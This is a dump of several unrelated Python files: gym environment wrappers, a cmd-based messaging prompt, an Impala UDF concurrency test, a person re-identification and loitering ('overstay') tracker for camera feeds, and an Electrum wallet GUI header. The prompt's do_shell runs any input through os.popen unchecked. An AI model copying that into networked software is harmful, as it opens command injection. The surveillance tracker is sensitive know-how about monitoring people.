action_space(self): space = self._env.action_space if not self._should_normalize_action: return space return gym.spaces.Box( -np.ones(space.shape), np.ones(space.shape), dtype=np.float32) def step(self, action): if self._should_normalize_action: action = self._denormalize_action(action) observ, reward, done, info = self._env.step(action) if self._should_normalize_observ: observ = self._normalize_observ(observ) return observ, reward, done, info def reset(self): observ = self._env.reset() if self._should_normalize_observ: observ = self._normalize_observ(observ) return observ def _denormalize_action(self, action): min_ = self._env.action_space.low max_ = self._env.action_space.high action = (action + 1) / 2 * (max_ - min_) + min_ return action def _normalize_observ(self, observ): min_ = self._env.observation_space.low max_ = self._env.observation_space.high observ = 2 * (observ - min_) / (max_ - min_) - 1 return observ def _is_finite(self, space): return np.isfinite(space.low).all() and np.isfinite(space.high).all() class ClipAction(AttributeModifier): """Clip out of range actions to the action space of the environment.""" def __init__(self, env): self._env = env @property def action_space(self): shape = self._env.action_space.shape return gym.spaces.Box( -np.inf * np.ones(shape), np.inf * np.ones(shape), dtype=np.float32) def step(self, action): action_space = self._env.action_space action = np.clip(action, 
action_space.low, action_space.high) return self._env.step(action) class LimitDuration(AttributeModifier): """End episodes after specified number of steps.""" def __init__(self, env, duration): self._env = env self._duration = duration self._step = None def step(self, action): if self._step is None: raise RuntimeError('Must reset environment.') observ, reward, done, info = self._env.step(action) self._step += 1 if self._step >= self._duration: done = True self._step = None return observ, reward, done, info def reset(self): self._step = 0 return self._env.reset() class ExternalProcess(object): """Step environment in a separate process for lock free paralellism.""" # Message types for communication via the pipe. _ACTION = 1 _RESET = 2 _CLOSE = 3 _GETATTRIBUTE = 4 _SETATTRIBUTE = 5 _TRANSITION = 6 _OBSERV = 7 _EXCEPTION = 8 _VALUE = 9 def __init__(self, constructor): """Step environment in a separate process for lock free paralellism. The environment will be created in the external process by calling the specified callable. This can be an environment class, or a function creating the environment and potentially wrapping it. The returned environment should not access global variables. Args: constructor: Callable that creates and returns an OpenAI gym environment. Attributes: observation_space: The cached observation space of the environment. action_space: The cached action space of the environment. """ self._conn, conn = multiprocessing.Pipe() self._process = multiprocessing.Process( target=self._worker, args=(constructor, conn)) atexit.register(self.close) self._process.start() self._observ_space = None self._action_space = None @property def observation_space(self): if not self._observ_space: self._observ_space = self.__getattr__('observation_space') return self._observ_space @property def action_space(self): if not self._action_space: self._action_space = self.__getattr__('action_space') return self._action_space def __getattr__(self, name): """Request an attribute from the environment. Note that this involves communication with the external process, so it can be slow. Args: name: Attribute to access. Returns: Value of the attribute. """ self._conn.send((self._GETATTRIBUTE, name)) return self._receive(self._VALUE) def set_attribute(self, name, value): """Set an attribute in the environment. Note that this involves communication with the external process, so it can be slow. Args: name: Attribute to access. value: New attribute value. """ self._conn.send((self._SETATTRIBUTE, (name, value))) def step(self, action, blocking=True): """Step the environment. Args: action: The action to apply to the environment. blocking: Whether to wait for the result. Returns: Transition tuple when blocking, otherwise callable that returns the transition tuple. """ self._conn.send((self._ACTION, action)) if blocking: return self._receive(self._TRANSITION) else: return functools.partial(self._receive, self._TRANSITION) def reset(self, blocking=True): """Reset the environment. Args: blocking: Whether to wait for the result. Returns: New observation when blocking, otherwise callable that returns the new observation. """ self._conn.send((self._RESET, None)) if blocking: return self._receive(self._OBSERV) else: return functools.partial(self._receive, self._OBSERV) def close(self): """Send a close message to the external process and join it.""" if self._process: try: self._conn.send((self._CLOSE, None)) self._conn.close() except IOError: # The connection was already closed. 
pass self._process.join() # Python leaks file descriptors without the line below del self._process del self._conn self._conn = None self._process = None else: pass # Don't close a connection twice def _receive(self, expected_message): """Wait for a message from the worker process and return its payload. Args: expected_message: Type of the expected message. Raises: Exception: An exception was raised inside the worker process. KeyError: The reveived message is not of the expected type. Returns: Payload object of the message. """ message, payload = self._conn.recv() # Re-raise exceptions in the main process. if message == self._EXCEPTION: stacktrace = payload raise Exception(stacktrace) if message == expected_message: return payload raise KeyError('Received message of unexpected type {}'.format(message)) def _worker(self, constructor, conn): """The process waits for actions and sends back environment results. Args: constructor: Constructor for the OpenAI Gym environment. conn: Connection for communication to the main process. """ try: env = constructor() while True: try: # Only block for short times to have keyboard exceptions be raised. if not conn.poll(0.1): continue message, payload = conn.recv() except (EOFError, KeyboardInterrupt): break if message == self._ACTION: action = payload conn.send((self._TRANSITION, env.step(action))) continue if message == self._RESET: assert payload is None conn.send((self._OBSERV, env.reset())) continue if message == self._GETATTRIBUTE: name = payload conn.send((self._VALUE, getattr(env, name))) continue if message == self._SETATTRIBUTE: name, value = payload set_attr = getattr(env, 'set_attribute', None) if callable(set_attr): env.set_attribute(name, value) else: setattr(env, name, value) continue if message == self._CLOSE: assert payload is None if hasattr(env, 'close'): env.close() break raise KeyError('Received message of unknown type {}'.format(message)) except Exception: # pylint: disable=broad-except stacktrace = ''.join(traceback.format_exception(*sys.exc_info())) # pylint: disable=no-value-for-parameter conn.send((self._EXCEPTION, stacktrace)) tf.logging.error('Error in environment process: {}'.format(stacktrace)) conn.close()
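

# --- Usage sketch (not part of the original module) --------------------------
# A minimal, hedged example of composing these wrappers. The environment id
# 'Pendulum-v0' and the 200-step episode cap are illustrative assumptions; any
# gym environment with finite Box observation/action spaces works the same way.
# ExternalProcess runs the wrapped environment in its own process, and
# step(..., blocking=False) returns a callable that resolves the transition
# later instead of waiting on the pipe.
def _example_constructor():
  env = gym.make('Pendulum-v0')  # assumed environment id
  env = RangeNormalize(env)      # map observations and actions to [-1, 1]
  return LimitDuration(env, duration=200)


if __name__ == '__main__':
  env = ExternalProcess(_example_constructor)
  observ = env.reset()                            # blocks until the worker replies
  pending = env.step(env.action_space.sample(), blocking=False)
  observ, reward, done, info = pending()          # resolve the deferred transition
  env.close()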
my_shell.py
from cmd import Cmd
from threading import Thread
import time
import os
import re


class RingPrompt(Cmd):
    prompt = ''
    intro = 'Welcome to the ring. Use ? to access the help'

    def do_exit(self, inp):
        print('Bye, see you next time!')
        return True

    def do_send(self, inp):
        # Message prototype: [id] <MESSAGE>
        result = re.search(r'^\[([0-9]*)\]', inp)
        if result:
            id_ = result.group(1)
            result = re.search(r'<([a-zA-Z0-9\,\.\;\'\"\!\?<> ]*)>', inp)
            if result:
                mess = result.group(1)
                print('Recipient: {}\nMessage: {}'.format(id_, mess))

    def echo_message(self, inp):
        print('Message received: {}'.format(inp))

    # def do_help(self, inp):
    #     print("Help not implemented yet")

    def do_shell(self, inp):
        print(os.popen(inp).read())


def managePrompt(prompt):
    prompt.cmdloop()


if __name__ == '__main__':
    prompt = RingPrompt()
    Thread(target=managePrompt, args=(prompt,)).start()
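

# Usage sketch (illustrative, not part of the original script): the command
# parser can also be exercised non-interactively through cmd.Cmd.onecmd, e.g.
#
#   p = RingPrompt()
#   p.onecmd('send [42] <hello there>')  # prints "Recipient: 42" / "Message: hello there"
#   p.echo_message('pong')               # prints "Message received: pong"
#   p.onecmd('exit')                     # prints the goodbye message and returns True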
test_udf_concurrency.py
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import os import pytest import random import threading import time from subprocess import check_call from tests.common.custom_cluster_test_suite import CustomClusterTestSuite from tests.common.impala_cluster import ImpalaCluster from tests.util.filesystem_utils import get_fs_path # This custom cluster test splits out concurrency tests to allow running with # a higher fe_service_threads (and thus higher concurrency). This also avoids # side-effects for other tests (see IMPALA-7639). class TestUdfConcurrency(CustomClusterTestSuite): @classmethod def get_workload(self): return 'functional-query' @classmethod def add_test_dimensions(cls): super(TestUdfConcurrency, cls).add_test_dimensions() @pytest.mark.execute_serially @CustomClusterTestSuite.with_args(impalad_args="--fe_service_threads=1000") def test_native_functions_race(self, vector, unique_database): """ IMPALA-6488: stress concurrent adds, uses, and deletes of native functions. Exposes a crash caused by use-after-free in lib-cache.""" # Native function used by a query. Stresses lib-cache during analysis and # backend expressions. create_fn_to_use = \ """create function {0}.use_it(string) returns string LOCATION '{1}' SYMBOL='_Z8IdentityPN10impala_udf15FunctionContextERKNS_9StringValE'""" use_fn = """select * from (select max(int_col) from functional.alltypesagg where {0}.use_it(string_col) = 'blah' union all (select max(int_col) from functional.alltypesagg where {0}.use_it(String_col) > '1' union all (select max(int_col) from functional.alltypesagg where {0}.use_it(string_col) > '1'))) v""" # Reference to another native function from the same 'so' file. Creating/dropping # stresses lib-cache lookup, add, and refresh. create_another_fn = """create function if not exists {0}.other(float) returns float location '{1}' symbol='Identity'""" drop_another_fn = """drop function if exists {0}.other(float)""" udf_path = get_fs_path('/test-warehouse/libTestUdfs.so') # Tracks number of impalads prior to tests to check that none have crashed. # All impalads are assumed to be coordinators. 
cluster = ImpalaCluster() exp_num_coordinators = cluster.num_responsive_coordinators() setup_client = self.create_impala_client() setup_query = create_fn_to_use.format(unique_database, udf_path) try: setup_client.execute(setup_query) except Exception as e: print "Unable to create initial function: {0}".format(setup_query) raise errors = [] def use_fn_method(): time.sleep(1 + random.random()) client = self.create_impala_client() query = use_fn.format(unique_database) try: client.execute(query) except Exception as e: errors.append(e) def load_fn_method(): time.sleep(1 + random.random()) client = self.create_impala_client() drop = drop_another_fn.format(unique_database) create = create_another_fn.format(unique_database, udf_path) try: client.execute(drop) client.execute(create) except Exception as e: errors.append(e) # number of uses/loads needed to reliably reproduce the bug. num_uses = 200 num_loads = 200 # create threads to use native function. runner_threads = [] for i in xrange(num_uses): runner_threads.append(threading.Thread(target=use_fn_method)) # create threads to drop/create native functions. for i in xrange(num_loads): runner_threads.append(threading.Thread(target=load_fn_method)) # launch all runner threads. for t in runner_threads: t.start() # join all threads. for t in runner_threads: t.join() for e in errors: print e # Checks that no impalad has crashed. assert cluster.num_responsive_coordinators() == exp_num_coordinators @pytest.mark.execute_serially @CustomClusterTestSuite.with_args(impalad_args="--fe_service_threads=1000") def test_concurrent_jar_drop_use(self, vector, unique_database): """IMPALA-6215: race between dropping/using java udf's defined in the same jar. This test runs concurrent drop/use threads that result in class not found exceptions when the race is present. """ udf_src_path = os.path.join( os.environ['IMPALA_HOME'], "testdata/udfs/impala-hive-udfs.jar") udf_tgt_path = get_fs_path( '/test-warehouse/{0}.db/impala-hive-udfs.jar'.format(unique_database)) create_fn_to_drop = """create function {0}.foo_{1}() returns string LOCATION '{2}' SYMBOL='org.apache.impala.TestUpdateUdf'""" create_fn_to_use = """create function {0}.use_it(string) returns string LOCATION '{1}' SYMBOL='org.apache.impala.TestUdf'""" drop_fn = "drop function if exists {0}.foo_{1}()" use_fn = """select * from (select max(int_col) from functional.alltypesagg where {0}.use_it(string_col) = 'blah' union all (select max(int_col) from functional.alltypesagg where {0}.use_it(String_col) > '1' union all (select max(int_col) from functional.alltypesagg where {0}.use_it(string_col) > '1'))) v""" num_drops = 100 num_uses = 100 # use a unique jar for this test to avoid interactions with other tests # that use the same jar check_call(["hadoop", "fs", "-put", "-f", udf_src_path, udf_tgt_path]) # create all the functions. 
setup_client = self.create_impala_client() try: s = create_fn_to_use.format(unique_database, udf_tgt_path) setup_client.execute(s) except Exception as e: print e assert False for i in range(0, num_drops): try: setup_client.execute(create_fn_to_drop.format(unique_database, i, udf_tgt_path)) except Exception as e: print e assert False errors = [] def use_fn_method(): time.sleep(5 + random.random()) client = self.create_impala_client() try: client.execute(use_fn.format(unique_database)) except Exception as e: errors.append(e) def drop_fn_method(i): time.sleep(1 + random.random()) client = self.create_impala_client() try: client.execute(drop_fn.format(unique_database, i)) except Exception as e: errors.append(e) # create threads to use functions. runner_threads = [] for i in range(0, num_uses): runner_threads.append(threading.Thread(target=use_fn_method)) # create threads to drop functions. for i in range(0, num_drops): runner_threads.append(threading.Thread(target=drop_fn_method, args=(i, ))) # launch all runner threads. for t in runner_threads: t.start() # join all threads. for t in runner_threads: t.join() # Check for any errors. for e in errors: print e assert len(errors) == 0
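

# A generic sketch (not part of the original test suite) of the pattern both
# tests above rely on: start many thread bodies concurrently, join them all,
# and collect any exceptions they raised. The helper name is illustrative only.
def run_racing_threads(thread_bodies):
  """Runs each callable in its own thread and returns the errors raised."""
  errors = []

  def make_runner(body):
    def runner():
      try:
        body()
      except Exception as e:  # pylint: disable=broad-except
        errors.append(e)
    return runner

  threads = [threading.Thread(target=make_runner(b)) for b in thread_bodies]
  for t in threads:
    t.start()
  for t in threads:
    t.join()
  return errors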
person.py
from .agent import * from .agent import _crop, _nd2file from .kcftracker import KCFTracker from .record import Record from .worker import Consumer from utils.action import cut, frames2data from time import time from datetime import datetime PAR = True DEBUG = False SIMILARITY_THRESHOLD = .85 DISTANCE_THRESHOLD = 200 FEATURE_MOMENTUM = .9 IMAGE_LIST_SIZE = 10 MIN_OVERSTAY = 120 def make_object_type(): class Person: current_id = 0 def __init__(self, feature, box): cls = type(self) self.id = str(cls.current_id) self.feature = feature self.box = box self.first_seen = self.last_seen = time() self.last_save = 0 self.imgs = [] # video clips of action recognition for each person id cls.current_id += 1 # def add_img(self, frame): # self.imgs.append(cut(frame, self.box)) # if len(self.imgs) > IMAGE_LIST_SIZE: # self.imgs.pop(0) def __str__(self): return self.id @staticmethod def is_overstay(seconds): return seconds > MIN_OVERSTAY @staticmethod def is_alike(similarity): return similarity > SIMILARITY_THRESHOLD @staticmethod def is_far(delta): return delta > DISTANCE_THRESHOLD return Person def make_track_type(): from .async_kcftracker import update class _Track(Track): ALL = set() current_id = 0 health = 5 CANDIDATE_IOU = .5 def step1(self, frame): coro = update(self.tracker, frame) try: coro.send(None) except StopIteration as e: new_box = e.value # new_box = self.tracker.update(frame) new_box = np.array(new_box) ds = new_box - self.box ds_ = ds if self.velocity is None else self.velocity self.velocity = ds * Track.momentum_ + ds_ * Track.momentum self.box = new_box H, W = frame.shape[:2] l, t, h, w = self.box if 0 < (l+w/2) < W and 0 < (t+h/2) < H: pass else: self.visible = False return _Track # return _Track class Storage: def __init__(self, object_type, memory=15): self.id_map = {} self.memory = memory self.object_type = object_type def add(self, feature, box): p = self.object_type(feature, box) self.id_map[p.id] = p def reg(self, feature, box): feature = np.array(feature, np.float32) if len(self.id_map): q = self.query(feature) p = self.id_map[q['id']] if self.object_type.is_far(abs(box - p.box).sum()): # diff # print('new', abs(box - p.box).sum()) self.add(feature, box) elif self.object_type.is_alike(q['similarity']): # same p.feature = p.feature * FEATURE_MOMENTUM + feature * (1-FEATURE_MOMENTUM) p.box = p.box * FEATURE_MOMENTUM + box * (1-FEATURE_MOMENTUM) else: # occlusion pass # ignore else: self.add(feature, box) def query(self, feature): assert len(self.id_map), 'no id in storage, register first!' 
similarity_lst = [] id_lst = [] for v in self.id_map.values(): similarity_lst += [self.compare(v.feature, feature)] id_lst += [v] idx = np.argmax(similarity_lst) id = id_lst[idx] sim = similarity_lst[idx] return {'id': str(id), 'similarity': similarity_lst[idx]} def forget(self): now = time() delete_keys = [] for k in self.id_map: if now - self.id_map[k].last_seen > self.memory: delete_keys.append(k) for k in delete_keys: del self.id_map[k] @staticmethod def compare(feature1, feature2): f1 = np.array(feature1) f2 = np.array(feature2) cos = np.dot(f1, f2)/np.linalg.norm(f1)/np.linalg.norm(f2) return cos # return np.exp(cos - 1) class PersonAgent(Agent): def __init__(self, source, host='localhost'): super().__init__(source, host) self.current_date = datetime.now().date() # - timedelta(days=1) source_dir = source[source.find('@')+1:source.find('/cam')] source_dir = os.path.basename(source_dir) self.source_dir = source_dir self.output_dir = os.path.join('output', source_dir, str(self.current_date)) if not os.path.exists(self.output_dir): os.makedirs(self.output_dir) self.output_log = os.path.join(self.output_dir + '/log.txt') self.Track = make_track_type() self.api_calls = {k: 0 for k in ['register', 'detection', 'feature', 'query', 'refresh', 'attributes', # 'action', ]} PAR_URL = 'http://%s:6666/att' % host EXT_URL = 'http://%s:6666/fea' % host # ACT_URL = 'http://%s:6671/act' % host self.storage = Storage(make_object_type()) # self.bag_storage = BagStorage() def par(img_file, api_calls): api_calls['attributes'] += 1 # print(img_file) response = requests.post(PAR_URL, files={'img': img_file}) att = response.json() return att # return np.array(response.json()['predictions'], dtype=np.uint8) def ext(img_file, api_calls): api_calls['feature'] += 1 response = requests.post(EXT_URL, files={'img': img_file}) return response.json() def query(feature, api_calls): api_calls['query'] += 1 try: return self.storage.query(feature) except AssertionError: return {} #Function to put frame into Record object and push to queue def output(record, frame): record.add_frame(frame) return record, frame # def act(img_list, api_calls): # api_calls['action'] += 1 # a = frames2data(img_list) # response = requests.post(ACT_URL, pickle.dumps(a)) # return response.json()[0] self.w_par = Worker(lambda i, x: (i, par(_nd2file(x), self.api_calls)), debug=DEBUG) self.w_ext = Worker(lambda i, x: (i, ext(_nd2file(x), self.api_calls))) self.w_cmp = Worker(lambda i, x: (i, query(x, self.api_calls))) #Worker containing the Record objects of overstayed objects self.w_record = Worker(lambda x, i: (x, output(x, i))) self.w_tracking = Consumer(lambda x: self.Track.step(x), debug=DEBUG) # self.w_act = Worker(lambda i, x: (i, act(x, self.api_calls))) self.workers.extend([self.w_ext, self.w_cmp, self.w_par, self.w_record, self.w_tracking, ]) # memory self.reported = set() self.th = Thread(target=self.loop, daemon=True) self.th.start() def on_new_det(self, t:Track, img_roi): self.w_ext.put(t, img_roi) #Function to check current system date def check_date(self): if datetime.now().date() > self.current_date: print('Creating new directory for {}'.format(datetime.now().date())) #Update date and create new directory self.current_date = datetime.now().date() new_dir = os.path.join(os.path.join('output', str(self.source_dir)), str(self.current_date)) os.makedirs(new_dir) #Change output directory and output log file paths self.output_dir = new_dir self.output_log = new_dir + '/log.txt' def loop(self): track_list = None while self.running: #Check 
date every 600 frames if self.frame_count % 600 == 0: self.check_date() self.Track.ALL = set() ret, frame = self.cap.read() if not ret or frame is None: self.cap = cv2.VideoCapture(self.source) # print('renewed', self.source) continue # frame = cv2.resize(frame, (0, 0), fx=.5, fy=.5) # down-sampling frame_ = frame.copy() self.w_tracking.put(frame_) # self.Track.step(frame_) if self.frame_count % INTEVAL == 0: self.w_det.put(frame_) self.storage.forget() self.Track.decay() now = time() for t in self.Track.ALL: p = self.storage.id_map.get(t.id) if p is not None: seconds = now - p.first_seen t.stay = seconds t.par = getattr(p, 'attributes', []) # p.add_img(frame_) # type Person # if len(p.imgs) >= IMAGE_LIST_SIZE and self.frame_count % TIMEWALL == 0: # self.w_act.put(p.id, p.imgs[-IMAGE_LIST_SIZE:]) if getattr(p, 'not_register', True): self.w_par.put(p, _crop(frame_, t.box)) p.not_register = False if self.storage.object_type.is_overstay(seconds): t.overstay = True if p.id not in self.reported and hasattr(p, 'attributes'): self.reported.add(p.id) output_path = os.path.join(self.output_dir, '{}_{}_{}.%s'.format(p.id, '_'.join(p.attributes), datetime.now())) self.w_record.put(Record(output_path % 'avi'), frame_) p.example = self.crop(frame_, t.box) cv2.imwrite(output_path % 'jpg', p.example) p.color = t.color # logging = ' '.join(['[overstay] id:', p.id, # 'attr:', ' '.join(p.attributes), # 'loc:', self.source]) # print(logging) # print(logging, file=open(self.output_log, 'a')) p.last_seen = now self._post_det_procedure() self._post_ext_procedure() self._post_cmp_procedure(frame_) # self._post_act_procedure() self._post_par_procedure() if not self.control_queue.empty(): x, y = self.control_queue.get() H, W, _ = frame.shape self.click_handle(int(x * W), int(y * H)) self._render(frame) #Perform post output procedure self._post_output_procedure(frame) x_offset = 200 for p in list(self.storage.id_map.values()): if hasattr(p, 'example'): example = p.example h, w, _ = example.shape x_offset_ = x_offset + w frame[0:h, x_offset:x_offset_] = example cv2.rectangle(frame, (x_offset, 0), (x_offset_, h), p.color, 1) cv2.putText(frame, p.id, (x_offset, h//2), cv2.FONT_HERSHEY_SIMPLEX, 1.2, p.color, 2) y_offset = 20 for a in p.attributes: cv2.putText(frame, a, (x_offset, h + y_offset), cv2.FONT_HERSHEY_SIMPLEX, 0.8, p.color, 2) y_offset += 20 x_offset = x_offset_ # print(self.display_queue.qsize()) # print(self.w_cmp.p.qsize(), self.w_cmp.q.qsize()) self.display_queue.put(frame) # give RGB self.frame_count += 1 self._kill_workers() def _post_det_procedure(self): if self.w_det.has_feedback(): frame_, boxes = self.w_det.get() if len(boxes): boxes, labels = _cvt_ltrb2ltwh(boxes) # TODO: seperate person and bags into boxes1 and boxes2 # memory bags in boxes2 # for b in boxes2: # self.bag_storage.reg(b) del labels self.Track.update(frame_, boxes) for t in self.Track.ALL: # t.visible=True if t.visible: if isinstance(t.id, int): if t.age % REFRESH_INTEVAL == 0: if t.age // REFRESH_INTEVAL: self.api_calls['refresh'] += 1 img_roi = _crop(frame_, t.box) self.on_new_det(t, img_roi) else: for t in self.Track.ALL: t.visible = False t.health -= 1 if t.age > self.Track.PROBATION else 9999 def _post_ext_procedure(self): if not self.w_ext.p.empty(): t, feature = self.w_ext.get() t.feature = feature self.w_cmp.put(t, feature) self.storage.reg(feature, t.box) self.api_calls['register'] += 1 def _post_cmp_procedure(self, frame_): if not self.w_cmp.p.empty(): t, ret = self.w_cmp.get() i = ret.get('id') if i is not None: 
t.similarity = ret.get('similarity') if self.storage.object_type.is_alike(t.similarity): c = colors[hash(i or 0) % 256] t.color = c t.id = i def _post_par_procedure(self): if not self.w_par.p.empty(): p, att = self.w_par.get() # person attributes p.attributes = att #Function to perform post output procedure def _post_output_procedure(self, frame): if self.w_record.has_feedback(): current_record, _ = self.w_record.get() #If True, save video if current_record.check_save(): current_record.save_video() else: self.w_record.put(current_record, frame) # def _post_act_procedure(self): # if not self.w_act.p.empty(): # i, ret = self.w_act.get() # if i in self.storage.id_map: # self.storage.id_map[i].action = ','.join(ret) # take the first action # # self.storage.id_map[i].action = ret[0] # take the first action def _render(self, frame): if len(self.points): for p in self.points: cv2.drawMarker(frame, p, (255, 0, 255)) if self.contour is not None: frame_ = frame.copy() cv2.drawContours(frame_, [self.contour], 0, (0, 255, 0), thickness=-1) opacity = .7 cv2.addWeighted(frame_, 1 - opacity, frame, opacity, 0., frame) cv2.rectangle(frame, (0,0), (200, 175), (128,128,128), -1) cv2.putText(frame, 'Tracks:%d' % len(self.Track.ALL), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 0), 2) for i, kv in enumerate(self.api_calls.items()): cv2.putText(frame, '{:<10}'.format(kv[0]), (10, i*20 + 60), cv2.FONT_HERSHEY_COMPLEX, 0.8, (0, 0, 0), 1) cv2.putText(frame, '{:>6}'.format(kv[1]), (100, i*20 + 60), cv2.FONT_HERSHEY_COMPLEX, 0.8, (0, 0, 0), 1) # trk_lst = [] # for trk in cls.ALL: # if isinstance(trk.id, str): # trk_lst += [trk] # else: # trk._render(frame) # unmatched tracks # for trk in trk_lst: # if trk.visible: # trk._render(frame) # tracks with matched ids for t in self.Track.ALL: if t.visible and getattr(t, 'overstay', False) or DEBUG: t._render(frame) x, y, w, h = map(int, t.box) if hasattr(t, 'overstay'): t.text(frame, 'overstay', int(x), int(y + h + 20)) # type Track if hasattr(t, 'stay'): t.text(frame, '%d' % int(t.stay), x + 3, y + h - 3, .6, 2) p = self.storage.id_map.get(t.id) if p is not None and hasattr(p, 'action'): y += 20 cv2.putText(frame, p.action, (x + w + 3, y), cv2.FONT_HERSHEY_SIMPLEX, 1., t.color, 2) if hasattr(t, 'par'): # docker image: par2 for a in t.par: y += 16 cv2.putText(frame, a, (x + w + 3, y), cv2.FONT_HERSHEY_SIMPLEX, 0.6, t.color, 2) @staticmethod def crop(frame, trk_box): H, W, _ = frame.shape left, t, w, h = map(int, trk_box) left = max(left, 0) t = max(t, 0) r = min(left + w, W) b = min(t + h, H) crop = frame[t: b, left: r, :] return crop def _cvt_ltrb2ltwh(boxes, contour=None): boxes_ = [] labels = [] if contour is None: for b in boxes: labels.append(b['label']) b = b['box'] boxes_.append([b['left'], b['top'], b['right'], b['bottom']]) else: for b in boxes: l = b['labels'] b = b['box'] left = b['left'] top = b['top'] right = b['right'] bottom = b['bottom'] point = ((left+right)/2, bottom) if cv2.pointPolygonTest(contour, point, False) > 0: # -1:out, 1: in, 0:on labels.append(l) boxes_.append([left, top, right, bottom]) else: print('excluded', b) boxes = np.array(boxes_) boxes[:, 2: 4] -= boxes[:, :2] return boxes[:, :4], labels
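

# Usage sketch (not part of the original module): how Storage performs
# cosine-similarity re-identification. The 128-dim feature vector and the box
# values below are made up, and `np` is assumed to come from the star import
# of .agent above (it is used throughout this module).
if __name__ == '__main__':
    Person = make_object_type()
    storage = Storage(Person)
    feature = np.random.rand(128).astype(np.float32)     # assumed descriptor size
    box = np.array([10, 20, 50, 100], dtype=np.float32)  # l, t, w, h
    storage.reg(feature, box)       # first registration creates a new Person id
    match = storage.query(feature)  # e.g. {'id': '0', 'similarity': ~1.0}
    print(match)
    storage.forget()                # drop ids unseen for longer than `memory` seconds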
main_window.py
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2012 thomasv@gitorious # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import sys import binascii import time import threading import os import traceback import json import weakref import csv from decimal import Decimal import base64 from functools import partial import queue import asyncio from typing import Optional, TYPE_CHECKING, Sequence, List, Union import eth_abi from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, QPoint from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget, QMenuBar, QFileDialog, QCheckBox, QLabel, QVBoxLayout, QGridLayout, QLineEdit, QHBoxLayout, QPushButton, QScrollArea, QTextEdit, QShortcut, QMainWindow, QCompleter, QInputDialog, QWidget, QSizePolicy, QStatusBar, QToolTip, QSplitter, QDialog, QMenu, QAction, QStackedWidget, QToolButton) import electrum from electrum.bitcoin import COIN, is_address, b58_address_to_hash160, Token, opcodes, \ TYPE_SCRIPT, is_hash160, hash_160, eth_abi_encode, Delegation, DELEGATE_ABI, DELEGATION_CONTRACT from electrum import (keystore, ecc, constants, util, bitcoin, commands, paymentrequest, lnutil) from electrum.plugin import run_hook, BasePlugin from electrum.i18n import _ from electrum.util import (format_time, UserCancelled, profiler, bfh, InvalidPassword, UserFacingException, get_new_wallet_name, send_exception_to_crash_reporter, InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds, NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs, AddTransactionException) from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice from electrum.transaction import (Transaction, PartialTxInput, PartialTransaction, PartialTxOutput) from electrum.transaction import contract_script, decode_opcreate_script, decode_opsender_script from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet, sweep_preparations, InternalAddressCorruption, CannotDoubleSpendTx) from electrum.version import ELECTRUM_VERSION from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError from electrum.exchange_rate import FxThread from electrum.simple_config import SimpleConfig from electrum.logging import Logger from electrum.lnutil import ln_dummy_address, extract_nodeid, 
ConnStringFormatError from electrum.lnaddr import lndecode, LnDecodeException from electrum.plugins.trezor.trezor import TrezorKeyStore from .exception_window import Exception_Hook from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit from .qrcodewidget import QRCodeWidget, QRDialog from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit from .transaction_dialog import show_transaction from .fee_slider import FeeSlider, FeeComboBox from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog, WindowModalDialog, ChoicesLayout, HelpLabel, Buttons, OkButton, InfoButton, WWLabel, TaskThread, CancelButton, CloseButton, HelpButton, MessageBoxMixin, EnterButton, import_meta_gui, export_meta_gui, filename_field, address_field, char_width_in_lineedit, webopen, TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT, getOpenFileName, getSaveFileName) from .util import ButtonsTextEdit, ButtonsLineEdit from .installwizard import WIF_HELP_TEXT from .history_list import HistoryList, HistoryModel from .update_checker import UpdateCheck, UpdateCheckThread from .channels_list import ChannelsList from .confirm_tx_dialog import ConfirmTxDialog from .transaction_dialog import PreviewTxDialog from .token_dialog import TokenAddDialog, TokenInfoDialog, TokenSendDialog from .smart_contract_dialog import ContractCreateDialog, ContractEditDialog, ContractFuncDialog from .delegation_dialog import DelegationDialog from electrum.coinchooser import SenderNoUTXOException if TYPE_CHECKING: from . import ElectrumGui LN_NUM_PAYMENT_ATTEMPTS = 10 class StatusBarButton(QToolButton): def __init__(self, icon, tooltip, func): QToolButton.__init__(self) self.setText('') self.setIcon(icon) self.setToolTip(tooltip) 